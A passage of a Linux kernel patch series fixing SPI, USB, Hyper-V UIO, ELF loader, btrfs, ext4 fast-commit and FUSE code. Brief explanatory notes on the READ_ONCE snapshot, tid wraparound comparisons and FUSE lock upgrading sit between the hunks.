+--- a/drivers/spi/spi-rockchip.c
++++ b/drivers/spi/spi-rockchip.c
+@@ -976,14 +976,16 @@ static int rockchip_spi_suspend(struct device *dev)
+ {
+ 	int ret;
+ 	struct spi_controller *ctlr = dev_get_drvdata(dev);
+-	struct rockchip_spi *rs = spi_controller_get_devdata(ctlr);
+ 
+ 	ret = spi_controller_suspend(ctlr);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	clk_disable_unprepare(rs->spiclk);
+-	clk_disable_unprepare(rs->apb_pclk);
++	ret = pm_runtime_force_suspend(dev);
++	if (ret < 0) {
++		spi_controller_resume(ctlr);
++		return ret;
++	}
+ 
+ 	pinctrl_pm_select_sleep_state(dev);
+ 
+@@ -994,25 +996,14 @@ static int rockchip_spi_resume(struct device *dev)
+ {
+ 	int ret;
+ 	struct spi_controller *ctlr = dev_get_drvdata(dev);
+-	struct rockchip_spi *rs = spi_controller_get_devdata(ctlr);
+ 
+ 	pinctrl_pm_select_default_state(dev);
+ 
+-	ret = clk_prepare_enable(rs->apb_pclk);
++	ret = pm_runtime_force_resume(dev);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = clk_prepare_enable(rs->spiclk);
+-	if (ret < 0)
+-		clk_disable_unprepare(rs->apb_pclk);
+-
+-	ret = spi_controller_resume(ctlr);
+-	if (ret < 0) {
+-		clk_disable_unprepare(rs->spiclk);
+-		clk_disable_unprepare(rs->apb_pclk);
+-	}
+-
+-	return 0;
++	return spi_controller_resume(ctlr);
+ }
+ #endif /* CONFIG_PM_SLEEP */
+ 
+diff --git a/drivers/staging/iio/frequency/ad9834.c b/drivers/staging/iio/frequency/ad9834.c
+index 2b4267a87e65e..89abb07092605 100644
+--- a/drivers/staging/iio/frequency/ad9834.c
++++ b/drivers/staging/iio/frequency/ad9834.c
+@@ -114,7 +114,7 @@ static int ad9834_write_frequency(struct ad9834_state *st,
+ 
+ 	clk_freq = clk_get_rate(st->mclk);
+ 
+-	if (fout > (clk_freq / 2))
++	if (!clk_freq || fout > (clk_freq / 2))
+ 		return -EINVAL;
+ 
+ 	regval = ad9834_calc_freqreg(clk_freq, fout);
+diff --git a/drivers/uio/uio_hv_generic.c b/drivers/uio/uio_hv_generic.c
+index e5789dfcaff61..d6472de1d4b09 100644
+--- a/drivers/uio/uio_hv_generic.c
++++ b/drivers/uio/uio_hv_generic.c
+@@ -104,10 +104,11 @@ static void hv_uio_channel_cb(void *context)
+ 
+ /*
+  * Callback from vmbus_event when channel is rescinded.
++ * It is meant for rescind of primary channels only.
+  */
+ static void hv_uio_rescind(struct vmbus_channel *channel)
+ {
+-	struct hv_device *hv_dev = channel->primary_channel->device_obj;
++	struct hv_device *hv_dev = channel->device_obj;
+ 	struct hv_uio_private_data *pdata = hv_get_drvdata(hv_dev);
+ 
+ 	/*
+@@ -118,6 +119,14 @@ static void hv_uio_rescind(struct vmbus_channel *channel)
+ 
+ 	/* Wake up reader */
+ 	uio_event_notify(&pdata->info);
++
++	/*
++	 * With a rescind callback registered, the rescind path will not
++	 * unregister the device from vmbus when the primary channel is
++	 * rescinded. Without unregistering, rescind handling is incomplete
++	 * and the next onoffer message does not arrive. Unregister the
++	 * device from vmbus here.
++	 */
++	vmbus_device_unregister(channel->device_obj);
+ }
+ 
+ /* Sysfs API to allow mmap of the ring buffers
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 5b761a2a87a7f..2cd780c74381e 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1305,6 +1305,21 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 		dwc3_writel(dwc->regs, DWC3_GUCTL2, reg);
+ 	}
+ 
++	/*
++	 * STAR 9001285599: This issue affects DWC_usb3 version 3.20a
++	 * only. If the PM TIMER ECN is enabled through GUCTL2[19], the
++	 * link compliance test (TD7.21) may fail. If the ECN is not
++	 * enabled (GUCTL2[19] = 0), the controller will use the old timer
++	 * value (5us), which is still acceptable for the link compliance
++	 * test. Therefore, do not enable the PM TIMER ECN in 3.20a by
++	 * default; keep GUCTL2[19] = 0.
++	 */
++	if (DWC3_VER_IS(DWC3, 320A)) {
++		reg = dwc3_readl(dwc->regs, DWC3_GUCTL2);
++		reg &= ~DWC3_GUCTL2_LC_TIMER;
++		dwc3_writel(dwc->regs, DWC3_GUCTL2, reg);
++	}
++
+ 	/*
+ 	 * When configured in HOST mode, after issuing U3/L2 exit controller
+ 	 * fails to send proper CRC checksum in CRC5 field. Because of this
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 472a6a7e1558a..251bc438bf401 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -404,6 +404,7 @@
+ 
+ /* Global User Control Register 2 */
+ #define DWC3_GUCTL2_RST_ACTBITLATER		BIT(14)
++#define DWC3_GUCTL2_LC_TIMER			BIT(19)
+ 
+ /* Global User Control Register 3 */
+ #define DWC3_GUCTL3_SPLITDISABLE		BIT(14)
+@@ -1232,6 +1233,7 @@ struct dwc3 {
+ #define DWC3_REVISION_290A	0x5533290a
+ #define DWC3_REVISION_300A	0x5533300a
+ #define DWC3_REVISION_310A	0x5533310a
++#define DWC3_REVISION_320A	0x5533320a
+ #define DWC3_REVISION_330A	0x5533330a
+ 
+ #define DWC31_REVISION_ANY	0x0
+diff --git a/drivers/usb/gadget/udc/aspeed_udc.c b/drivers/usb/gadget/udc/aspeed_udc.c
+index cedf17e38245d..1a5a1115c1d96 100644
+--- a/drivers/usb/gadget/udc/aspeed_udc.c
++++ b/drivers/usb/gadget/udc/aspeed_udc.c
+@@ -1009,6 +1009,8 @@ static void ast_udc_getstatus(struct ast_udc_dev *udc)
+ 		break;
+ 	case USB_RECIP_ENDPOINT:
+ 		epnum = crq.wIndex & USB_ENDPOINT_NUMBER_MASK;
++		if (epnum >= AST_UDC_NUM_ENDPOINTS)
++			goto stall;
+ 		status = udc->ep[epnum].stopped;
+ 		break;
+ 	default:
+diff --git a/drivers/usb/storage/uas.c b/drivers/usb/storage/uas.c
+index af619efe8eabf..b565c1eb84b3b 100644
+--- a/drivers/usb/storage/uas.c
++++ b/drivers/usb/storage/uas.c
+@@ -422,6 +422,7 @@ static void uas_data_cmplt(struct urb *urb)
+ 			uas_log_cmd_state(cmnd, "data cmplt err", status);
+ 		/* error: no data transferred */
+ 		scsi_set_resid(cmnd, sdb->length);
++		set_host_byte(cmnd, DID_ERROR);
+ 	} else {
+ 		scsi_set_resid(cmnd, sdb->length - urb->actual_length);
+ 	}
+diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c
+index e6c9c0e084486..89e7e4826efce 100644
+--- a/fs/binfmt_elf.c
++++ b/fs/binfmt_elf.c
+@@ -1009,7 +1009,8 @@ static int load_elf_binary(struct linux_binprm *bprm)
+ 	if (elf_read_implies_exec(*elf_ex, executable_stack))
+ 		current->personality |= READ_IMPLIES_EXEC;
+ 
+-	if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
++	const int snapshot_randomize_va_space = READ_ONCE(randomize_va_space);
++	if (!(current->personality & ADDR_NO_RANDOMIZE) && snapshot_randomize_va_space)
+ 		current->flags |= PF_RANDOMIZE;
+ 
+ 	setup_new_exec(bprm);
+@@ -1301,7 +1302,7 @@ static int load_elf_binary(struct linux_binprm *bprm)
+ 	mm->end_data = end_data;
+ 	mm->start_stack = bprm->p;
+ 
+-	if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) {
++	if ((current->flags & PF_RANDOMIZE) && (snapshot_randomize_va_space > 1)) {
+ 		/*
+ 		 * For architectures with ELF randomization, when executing
+ 		 * a loader directly (i.e. no interpreter listed in ELF
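
Snapshotting randomize_va_space once with READ_ONCE() guarantees that both tests in load_elf_binary() agree even if the sysctl is flipped concurrently; without it, PF_RANDOMIZE could be set by the first read while the second read sees 0 (or vice versa). The pattern in isolation (knob and helpers hypothetical):

static int knob;	/* imagine another task can write this at any time */

static void configure(void)
{
	const int snap = READ_ONCE(knob);	/* read shared state once */

	if (snap)			/* decision 1 */
		enable_feature();	/* hypothetical */
	if (snap > 1)			/* decision 2, same snapshot */
		enable_extra();		/* hypothetical */
}
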
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index e08688844f1e1..66d1f34c3fc69 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -324,8 +324,16 @@ static noinline int update_ref_for_cow(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	owner = btrfs_header_owner(buf);
+-	BUG_ON(owner == BTRFS_TREE_RELOC_OBJECTID &&
+-	       !(flags & BTRFS_BLOCK_FLAG_FULL_BACKREF));
++	if (unlikely(owner == BTRFS_TREE_RELOC_OBJECTID &&
++		     !(flags & BTRFS_BLOCK_FLAG_FULL_BACKREF))) {
++		btrfs_crit(fs_info,
++"found tree block at bytenr %llu level %d root %llu refs %llu flags %llx without full backref flag set",
++			   buf->start, btrfs_header_level(buf),
++			   btrfs_root_id(root), refs, flags);
++		ret = -EUCLEAN;
++		btrfs_abort_transaction(trans, ret);
++		return ret;
++	}
+ 
+ 	if (refs > 1) {
+ 		if ((owner == root->root_key.objectid ||
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index 853b1f96b1fdc..cca1acf2e0371 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -1553,7 +1553,6 @@ struct btrfs_drop_extents_args {
+ struct btrfs_file_private {
+ 	void *filldir_buf;
+ 	u64 last_index;
+-	bool fsync_skip_inode_lock;
+ };
+ 
+ 
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 528cd88a77fd7..0d97c8ee6b4fb 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -5141,7 +5141,15 @@ static noinline void reada_walk_down(struct btrfs_trans_handle *trans,
+ 		/* We don't care about errors in readahead. */
+ 		if (ret < 0)
+ 			continue;
+-		BUG_ON(refs == 0);
++
++		/*
++		 * This could be racy: it's conceivable that we raced and ended
++		 * up with a bogus refs count. If that's the case just skip it;
++		 * if we are actually corrupt we will notice when we look
++		 * everything up again with our locks held.
++		 */
++		if (refs == 0)
++			continue;
+ 
+ 		if (wc->stage == DROP_REFERENCE) {
+ 			if (refs == 1)
+@@ -5200,7 +5208,7 @@ static noinline int walk_down_proc(struct btrfs_trans_handle *trans,
+ 	if (lookup_info &&
+ 	    ((wc->stage == DROP_REFERENCE && wc->refs[level] != 1) ||
+ 	     (wc->stage == UPDATE_BACKREF && !(wc->flags[level] & flag)))) {
+-		BUG_ON(!path->locks[level]);
++		ASSERT(path->locks[level]);
+ 		ret = btrfs_lookup_extent_info(trans, fs_info,
+ 					       eb->start, level, 1,
+ 					       &wc->refs[level],
+@@ -5208,7 +5216,11 @@ static noinline int walk_down_proc(struct btrfs_trans_handle *trans,
+ 		BUG_ON(ret == -ENOMEM);
+ 		if (ret)
+ 			return ret;
+-		BUG_ON(wc->refs[level] == 0);
++		if (unlikely(wc->refs[level] == 0)) {
++			btrfs_err(fs_info, "bytenr %llu has 0 references, expect > 0",
++				  eb->start);
++			return -EUCLEAN;
++		}
+ 	}
+ 
+ 	if (wc->stage == DROP_REFERENCE) {
+@@ -5224,7 +5236,7 @@ static noinline int walk_down_proc(struct btrfs_trans_handle *trans,
+ 
+ 	/* wc->stage == UPDATE_BACKREF */
+ 	if (!(wc->flags[level] & flag)) {
+-		BUG_ON(!path->locks[level]);
++		ASSERT(path->locks[level]);
+ 		ret = btrfs_inc_ref(trans, root, eb, 1);
+ 		BUG_ON(ret); /* -ENOMEM */
+ 		ret = btrfs_dec_ref(trans, root, eb, 0);
+@@ -5338,8 +5350,9 @@ static noinline int do_walk_down(struct btrfs_trans_handle *trans,
+ 		goto out_unlock;
+ 
+ 	if (unlikely(wc->refs[level - 1] == 0)) {
+-		btrfs_err(fs_info, "Missing references.");
+-		ret = -EIO;
++		btrfs_err(fs_info, "bytenr %llu has 0 references, expect > 0",
++			  bytenr);
++		ret = -EUCLEAN;
+ 		goto out_unlock;
+ 	}
+ 	*lookup_info = 0;
+@@ -5540,7 +5553,12 @@ static noinline int walk_up_proc(struct btrfs_trans_handle *trans,
+ 				path->locks[level] = 0;
+ 				return ret;
+ 			}
+-			BUG_ON(wc->refs[level] == 0);
++			if (unlikely(wc->refs[level] == 0)) {
++				btrfs_tree_unlock_rw(eb, path->locks[level]);
++				btrfs_err(fs_info, "bytenr %llu has 0 references, expect > 0",
++					  eb->start);
++				return -EUCLEAN;
++			}
+ 			if (wc->refs[level] == 1) {
+ 				btrfs_tree_unlock_rw(eb, path->locks[level]);
+ 				path->locks[level] = 0;
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index e23d178f97782..c8231677c79ef 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -1534,13 +1534,6 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 	if (IS_ERR_OR_NULL(dio)) {
+ 		err = PTR_ERR_OR_ZERO(dio);
+ 	} else {
+-		struct btrfs_file_private stack_private = { 0 };
+-		struct btrfs_file_private *private;
+-		const bool have_private = (file->private_data != NULL);
+-
+-		if (!have_private)
+-			file->private_data = &stack_private;
+-
+ 		/*
+ 		 * If we have a synchronous write, we must make sure the fsync
+ 		 * triggered by the iomap_dio_complete() call below doesn't
+@@ -1549,13 +1542,10 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 		 * partial writes due to the input buffer (or parts of it) not
+ 		 * being already faulted in.
+ 		 */
+-		private = file->private_data;
+-		private->fsync_skip_inode_lock = true;
++		ASSERT(current->journal_info == NULL);
++		current->journal_info = BTRFS_TRANS_DIO_WRITE_STUB;
+ 		err = iomap_dio_complete(dio);
+-		private->fsync_skip_inode_lock = false;
+-
+-		if (!have_private)
+-			file->private_data = NULL;
++		current->journal_info = NULL;
+ 	}
+ 
+ 	/* No increment (+=) because iomap returns a cumulative value. */
+@@ -1795,7 +1785,6 @@ static inline bool skip_inode_logging(const struct btrfs_log_ctx *ctx)
+  */
+ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ {
+-	struct btrfs_file_private *private = file->private_data;
+ 	struct dentry *dentry = file_dentry(file);
+ 	struct inode *inode = d_inode(dentry);
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(inode->i_sb);
+@@ -1805,7 +1794,13 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	int ret = 0, err;
+ 	u64 len;
+ 	bool full_sync;
+-	const bool skip_ilock = (private ? private->fsync_skip_inode_lock : false);
++	bool skip_ilock = false;
++
++	if (current->journal_info == BTRFS_TRANS_DIO_WRITE_STUB) {
++		skip_ilock = true;
++		current->journal_info = NULL;
++		lockdep_assert_held(&inode->i_rwsem);
++	}
+ 
+ 	trace_btrfs_sync_file(file, datasync);
+ 
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 934e360d1aefa..e5017b2ade573 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -5890,7 +5890,7 @@ struct inode *btrfs_lookup_dentry(struct inode *dir, struct dentry *dentry)
+ 	struct inode *inode;
+ 	struct btrfs_root *root = BTRFS_I(dir)->root;
+ 	struct btrfs_root *sub_root = root;
+-	struct btrfs_key location;
++	struct btrfs_key location = { 0 };
+ 	u8 di_type = 0;
+ 	int ret = 0;
+ 
+diff --git a/fs/btrfs/transaction.h b/fs/btrfs/transaction.h
+index 970ff316069dd..8b88446df36dc 100644
+--- a/fs/btrfs/transaction.h
++++ b/fs/btrfs/transaction.h
+@@ -11,6 +11,12 @@
+ #include "delayed-ref.h"
+ #include "ctree.h"
+ 
++/*
++ * Signal that a direct IO write is in progress, to avoid deadlock for sync
++ * direct IO writes when fsync is called during the direct IO write path.
++ */
++#define BTRFS_TRANS_DIO_WRITE_STUB	((void *) 1)
++
+ enum btrfs_trans_state {
+ 	TRANS_STATE_RUNNING,
+ 	TRANS_STATE_COMMIT_START,
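
current->journal_info is not otherwise used across the iomap_dio_complete() call, so btrfs can borrow it as a per-task marker: the direct IO write path plants the stub before completing the dio, and btrfs_sync_file() consumes it to learn that i_rwsem is already held. Stripped to its essentials (names hypothetical):

#define DIO_WRITE_STUB	((void *)1)	/* any non-NULL sentinel */

static void dio_write_path(struct kiocb *iocb)
{
	ASSERT(current->journal_info == NULL);
	current->journal_info = DIO_WRITE_STUB;	/* "i_rwsem already held" */
	complete_dio(iocb);			/* may re-enter fsync */
	current->journal_info = NULL;
}

static int fsync_path(struct inode *inode)
{
	bool skip_ilock = false;

	if (current->journal_info == DIO_WRITE_STUB) {
		skip_ilock = true;
		current->journal_info = NULL;	/* consume the marker */
		lockdep_assert_held(&inode->i_rwsem);
	}
	/* ... take i_rwsem only when !skip_ilock ... */
	return 0;
}
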
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 19353a2f44bb3..2ef773d40ffda 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -353,7 +353,7 @@ void ext4_fc_mark_ineligible(struct super_block *sb, int reason, handle_t *handl
+ 		read_unlock(&sbi->s_journal->j_state_lock);
+ 	}
+ 	spin_lock(&sbi->s_fc_lock);
+-	if (sbi->s_fc_ineligible_tid < tid)
++	if (tid_gt(tid, sbi->s_fc_ineligible_tid))
+ 		sbi->s_fc_ineligible_tid = tid;
+ 	spin_unlock(&sbi->s_fc_lock);
+ 	WARN_ON(reason >= EXT4_FC_REASON_MAX);
+@@ -1235,7 +1235,7 @@ int ext4_fc_commit(journal_t *journal, tid_t commit_tid)
+ 	if (ret == -EALREADY) {
+ 		/* There was an ongoing commit, check if we need to restart */
+ 		if (atomic_read(&sbi->s_fc_subtid) <= subtid &&
+-			commit_tid > journal->j_commit_sequence)
++		    tid_gt(commit_tid, journal->j_commit_sequence))
+ 			goto restart_fc;
+ 		ext4_fc_update_stats(sb, EXT4_FC_STATUS_SKIPPED, 0, 0,
+ 				commit_tid);
+@@ -1310,7 +1310,7 @@ static void ext4_fc_cleanup(journal_t *journal, int full, tid_t tid)
+ 		list_del_init(&iter->i_fc_list);
+ 		ext4_clear_inode_state(&iter->vfs_inode,
+ 				       EXT4_STATE_FC_COMMITTING);
+-		if (iter->i_sync_tid <= tid)
++		if (tid_geq(tid, iter->i_sync_tid))
+ 			ext4_fc_reset_inode(&iter->vfs_inode);
+ 		/* Make sure EXT4_STATE_FC_COMMITTING bit is clear */
+ 		smp_mb();
+@@ -1341,7 +1341,7 @@ static void ext4_fc_cleanup(journal_t *journal, int full, tid_t tid)
+ 	list_splice_init(&sbi->s_fc_q[FC_Q_STAGING],
+ 				&sbi->s_fc_q[FC_Q_MAIN]);
+ 
+-	if (tid >= sbi->s_fc_ineligible_tid) {
++	if (tid_geq(tid, sbi->s_fc_ineligible_tid)) {
+ 		sbi->s_fc_ineligible_tid = 0;
+ 		ext4_clear_mount_flag(sb, EXT4_MF_FC_INELIGIBLE);
+ 	}
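
The plain <, <= and >= comparisons being replaced break once the 32-bit transaction ID wraps; tid_gt()/tid_geq() from include/linux/jbd2.h compare in modular arithmetic, the same trick as time_after():

static inline int tid_gt(tid_t x, tid_t y)
{
	int difference = (x - y);
	return (difference > 0);
}

For example, with x = 3 just after a wrap and y = 0xfffffffe just before it, x - y is 5 as a signed int, so tid_gt(x, y) correctly reports x as the newer tid even though x < y numerically.
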
+diff --git a/fs/fuse/dev.c b/fs/fuse/dev.c
+index 96a717f73ce37..7e0d4f08a0cf5 100644
+--- a/fs/fuse/dev.c
++++ b/fs/fuse/dev.c
+@@ -476,6 +476,8 @@ static void fuse_args_to_req(struct fuse_req *req, struct fuse_args *args)
+ 	req->in.h.opcode = args->opcode;
+ 	req->in.h.nodeid = args->nodeid;
+ 	req->args = args;
++	if (args->is_ext)
++		req->in.h.total_extlen = args->in_args[args->ext_idx].size / 8;
+ 	if (args->end)
+ 		__set_bit(FR_ASYNC, &req->flags);
+ }
+@@ -1498,7 +1500,7 @@ static int fuse_notify_inval_entry(struct fuse_conn *fc, unsigned int size,
+ 	buf[outarg.namelen] = 0;
+ 
+ 	down_read(&fc->killsb);
+-	err = fuse_reverse_inval_entry(fc, outarg.parent, 0, &name);
++	err = fuse_reverse_inval_entry(fc, outarg.parent, 0, &name, outarg.flags);
+ 	up_read(&fc->killsb);
+ 	kfree(buf);
+ 	return err;
+@@ -1546,7 +1548,7 @@ static int fuse_notify_delete(struct fuse_conn *fc, unsigned int size,
+ 	buf[outarg.namelen] = 0;
+ 
+ 	down_read(&fc->killsb);
+-	err = fuse_reverse_inval_entry(fc, outarg.parent, outarg.child, &name);
++	err = fuse_reverse_inval_entry(fc, outarg.parent, outarg.child, &name, 0);
+ 	up_read(&fc->killsb);
+ 	kfree(buf);
+ 	return err;
+diff --git a/fs/fuse/dir.c b/fs/fuse/dir.c
+index 936a24b646cef..aa2be4c1ea8f2 100644
+--- a/fs/fuse/dir.c
++++ b/fs/fuse/dir.c
+@@ -470,7 +470,7 @@ static struct dentry *fuse_lookup(struct inode *dir, struct dentry *entry,
+ }
+ 
+ static int get_security_context(struct dentry *entry, umode_t mode,
+-				void **security_ctx, u32 *security_ctxlen)
++				struct fuse_in_arg *ext)
+ {
+ 	struct fuse_secctx *fctx;
+ 	struct fuse_secctx_header *header;
+@@ -517,14 +517,42 @@ static int get_security_context(struct dentry *entry, umode_t mode,
+ 
+ 		memcpy(ptr, ctx, ctxlen);
+ 	}
+-	*security_ctxlen = total_len;
+-	*security_ctx = header;
++	ext->size = total_len;
++	ext->value = header;
+ 	err = 0;
+ out_err:
+ 	kfree(ctx);
+ 	return err;
+ }
+ 
++static int get_create_ext(struct fuse_args *args, struct dentry *dentry,
++			  umode_t mode)
++{
++	struct fuse_conn *fc = get_fuse_conn_super(dentry->d_sb);
++	struct fuse_in_arg ext = { .size = 0, .value = NULL };
++	int err = 0;
++
++	if (fc->init_security)
++		err = get_security_context(dentry, mode, &ext);
++
++	if (!err && ext.size) {
++		WARN_ON(args->in_numargs >= ARRAY_SIZE(args->in_args));
++		args->is_ext = true;
++		args->ext_idx = args->in_numargs++;
++		args->in_args[args->ext_idx] = ext;
++	} else {
++		kfree(ext.value);
++	}
++
++	return err;
++}
++
++static void free_ext_value(struct fuse_args *args)
++{
++	if (args->is_ext)
++		kfree(args->in_args[args->ext_idx].value);
++}
++
+ /*
+  * Atomic create+open operation
+  *
+@@ -545,8 +573,6 @@ static int fuse_create_open(struct inode *dir, struct dentry *entry,
+ 	struct fuse_entry_out outentry;
+ 	struct fuse_inode *fi;
+ 	struct fuse_file *ff;
+-	void *security_ctx = NULL;
+-	u32 security_ctxlen;
+ 	bool trunc = flags & O_TRUNC;
+ 
+ 	/* Userspace expects S_IFREG in create mode */
+@@ -590,19 +616,12 @@ static int fuse_create_open(struct inode *dir, struct dentry *entry,
+ 	args.out_args[1].size = sizeof(outopen);
+ 	args.out_args[1].value = &outopen;
+ 
+-	if (fm->fc->init_security) {
+-		err = get_security_context(entry, mode, &security_ctx,
+-					   &security_ctxlen);
+-		if (err)
+-			goto out_put_forget_req;
+-
+-		args.in_numargs = 3;
+-		args.in_args[2].size = security_ctxlen;
+-		args.in_args[2].value = security_ctx;
+-	}
++	err = get_create_ext(&args, entry, mode);
++	if (err)
++		goto out_free_ff;
+ 
+ 	err = fuse_simple_request(fm, &args);
+-	kfree(security_ctx);
++	free_ext_value(&args);
+ 	if (err)
+ 		goto out_free_ff;
+ 
+@@ -709,8 +728,6 @@ static int create_new_entry(struct fuse_mount *fm, struct fuse_args *args,
+ 	struct dentry *d;
+ 	int err;
+ 	struct fuse_forget_link *forget;
+-	void *security_ctx = NULL;
+-	u32 security_ctxlen;
+ 
+ 	if (fuse_is_bad(dir))
+ 		return -EIO;
+@@ -725,21 +742,14 @@ static int create_new_entry(struct fuse_mount *fm, struct fuse_args *args,
+ 	args->out_args[0].size = sizeof(outarg);
+ 	args->out_args[0].value = &outarg;
+ 
+-	if (fm->fc->init_security && args->opcode != FUSE_LINK) {
+-		err = get_security_context(entry, mode, &security_ctx,
+-					   &security_ctxlen);
++	if (args->opcode != FUSE_LINK) {
++		err = get_create_ext(args, entry, mode);
+ 		if (err)
+ 			goto out_put_forget_req;
+-
+-		BUG_ON(args->in_numargs != 2);
+-
+-		args->in_numargs = 3;
+-		args->in_args[2].size = security_ctxlen;
+-		args->in_args[2].value = security_ctx;
+ 	}
+ 
+ 	err = fuse_simple_request(fm, args);
+-	kfree(security_ctx);
++	free_ext_value(args);
+ 	if (err)
+ 		goto out_put_forget_req;
+ 
+@@ -1174,7 +1184,7 @@ int fuse_update_attributes(struct inode *inode, struct file *file, u32 mask)
+ }
+ 
+ int fuse_reverse_inval_entry(struct fuse_conn *fc, u64 parent_nodeid,
+-			     u64 child_nodeid, struct qstr *name)
++			     u64 child_nodeid, struct qstr *name, u32 flags)
+ {
+ 	int err = -ENOTDIR;
+ 	struct inode *parent;
+@@ -1201,7 +1211,9 @@ int fuse_reverse_inval_entry(struct fuse_conn *fc, u64 parent_nodeid,
+ 		goto unlock;
+ 
+ 	fuse_dir_changed(parent);
+-	fuse_invalidate_entry(entry);
++	if (!(flags & FUSE_EXPIRE_ONLY))
++		d_invalidate(entry);
++	fuse_invalidate_entry_cache(entry);
+ 
+ 	if (child_nodeid != 0 && d_really_is_positive(entry)) {
+ 		inode_lock(d_inode(entry));
+diff --git a/fs/fuse/file.c b/fs/fuse/file.c
+index c996c0ef8c632..0df1311afb87d 100644
+--- a/fs/fuse/file.c
++++ b/fs/fuse/file.c
+@@ -1563,14 +1563,47 @@ static ssize_t fuse_direct_read_iter(struct kiocb *iocb, struct iov_iter *to)
+ 	return res;
+ }
+ 
++static bool fuse_direct_write_extending_i_size(struct kiocb *iocb,
++					       struct iov_iter *iter)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++
++	return iocb->ki_pos + iov_iter_count(iter) > i_size_read(inode);
++}
++
+ static ssize_t fuse_direct_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ {
+ 	struct inode *inode = file_inode(iocb->ki_filp);
++	struct file *file = iocb->ki_filp;
++	struct fuse_file *ff = file->private_data;
+ 	struct fuse_io_priv io = FUSE_IO_PRIV_SYNC(iocb);
+ 	ssize_t res;
++	bool exclusive_lock =
++		!(ff->open_flags & FOPEN_PARALLEL_DIRECT_WRITES) ||
++		iocb->ki_flags & IOCB_APPEND ||
++		fuse_direct_write_extending_i_size(iocb, from);
++
++	/*
++	 * Take exclusive lock if
++	 * - Parallel direct writes are disabled - a user space decision
++	 * - Parallel direct writes are enabled and i_size is being extended.
++	 *   This might not be needed at all, but needs further investigation.
++	 */
++	if (exclusive_lock)
++		inode_lock(inode);
++	else {
++		inode_lock_shared(inode);
++
++		/* A race with truncate might have come up, as the decision for
++		 * the lock type was made without holding the lock; check again.
++		 */
++		if (fuse_direct_write_extending_i_size(iocb, from)) {
++			inode_unlock_shared(inode);
++			inode_lock(inode);
++			exclusive_lock = true;
++		}
++	}
+ 
+-	/* Don't allow parallel writes to the same file */
+-	inode_lock(inode);
+ 	res = generic_write_checks(iocb, from);
+ 	if (res > 0) {
+ 		if (!is_sync_kiocb(iocb) && iocb->ki_flags & IOCB_DIRECT) {
+@@ -1581,7 +1614,10 @@ static ssize_t fuse_direct_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 			fuse_write_update_attr(inode, iocb->ki_pos, res);
+ 		}
+ 	}
+-	inode_unlock(inode);
++	if (exclusive_lock)
++		inode_unlock(inode);
++	else
++		inode_unlock_shared(inode);
+ 
+ 	return res;
+ }
+@@ -1703,10 +1739,16 @@ __acquires(fi->lock)
+ 	fuse_writepage_finish(fm, wpa);
+ 	spin_unlock(&fi->lock);
+ 
+-	/* After fuse_writepage_finish() aux request list is private */
++	/* After rb_erase() aux request list is private */
+ 	for (aux = wpa->next; aux; aux = next) {
++		struct backing_dev_info *bdi = inode_to_bdi(aux->inode);
++
+ 		next = aux->next;
+ 		aux->next = NULL;
++
++		dec_wb_stat(&bdi->wb, WB_WRITEBACK);
++		dec_node_page_state(aux->ia.ap.pages[0], NR_WRITEBACK_TEMP);
++		wb_writeout_inc(&bdi->wb);
+ 		fuse_writepage_free(aux);
+ 	}
+ 
+@@ -2931,6 +2973,7 @@ fuse_direct_IO(struct kiocb *iocb, struct iov_iter *iter)
+ 
+ 	if (iov_iter_rw(iter) == WRITE) {
+ 		fuse_write_update_attr(inode, pos, ret);
++		/* For extending writes we already hold exclusive lock */
+ 		if (ret < 0 && offset + count > i_size)
+ 			fuse_do_truncate(file);
+ 	}
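
The lock choice in fuse_direct_write_iter() is made before any lock is held, so the shared path has to be re-validated: once inode_lock_shared() is taken, a concurrent truncate can no longer move i_size under us, and if the write turns out to be extending after all, the code upgrades to the exclusive lock. Condensed (the predicate is a hypothetical stand-in for fuse_direct_write_extending_i_size()):

	bool excl = write_extends_i_size(iocb, from);	/* unlocked guess */

	if (excl) {
		inode_lock(inode);
	} else {
		inode_lock_shared(inode);
		/* guess raced with truncate? upgrade via unlock + relock */
		if (write_extends_i_size(iocb, from)) {
			inode_unlock_shared(inode);
			inode_lock(inode);
			excl = true;
		}
	}
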
+diff --git a/fs/fuse/fuse_i.h b/fs/fuse/fuse_i.h
+index 66c2a99994683..6c3ec70c1b70d 100644
+--- a/fs/fuse/fuse_i.h
++++ b/fs/fuse/fuse_i.h
+@@ -264,8 +264,9 @@ struct fuse_page_desc {
+ struct fuse_args {
+ 	uint64_t nodeid;
